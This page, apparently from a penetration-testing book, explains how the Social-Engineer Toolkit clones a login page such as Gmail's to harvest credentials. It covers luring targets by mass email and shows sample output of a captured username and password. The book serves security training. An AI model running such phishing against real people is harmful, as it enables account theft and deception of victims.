The Social-Engineer Toolkit
149
After you select
Website Attack Vectors
and the
Credential Harvester
,
choose
Site Cloner
. The configuration for this attack is minimal and requires
only that you pass a URL (
http://www.secmaniac.com
) to SET that contains a
login form.
The web server runs and waits for the target’s response. As mentioned
previously, you could in this instance set
WEBATTACK_CONFIG=ON
, and SET would
prompt you to attempt mass emails to coax targets into clicking the link. The
target would be presented with a web page that looks identical to Gmail’s
website and initial login page. When the target enters his password, the
browser automatically redirects to the original Gmail website, while the fol-
lowing information is presented to the attacker:
10.10.1.102 - - "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-1174166214807618980
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: GALX=S3ftXFIww0E
POSSIBLE USERNAME FIELD FOUND: Email=ihazomgsecurity2390239203
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisisacomplexp@55w0rd!!!!!
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
SET uses a built-in dictionary to mark form fields and parameters on
sites that might contain sensitive information. It red-highlights potential
username and password parameters to indicate that they could be sensitive
parameters that are worth investigating.
Once you’ve finished harvesting all of the target’s credentials, press
CTRL
-C
to generate a report, as shown in Figure 10-3. The report uses XML and HTML
formatting.
SET’s web server is multithreaded and can handle as many requests as
your server can handle. When a number of targets enter their credentials
into the site, SET will automatically parse those results into a report format
that separates the form fields in a readable format.
You can also export the credential harvesting results in an XML-compliant
format to later import into tools or parsers that you’re already using.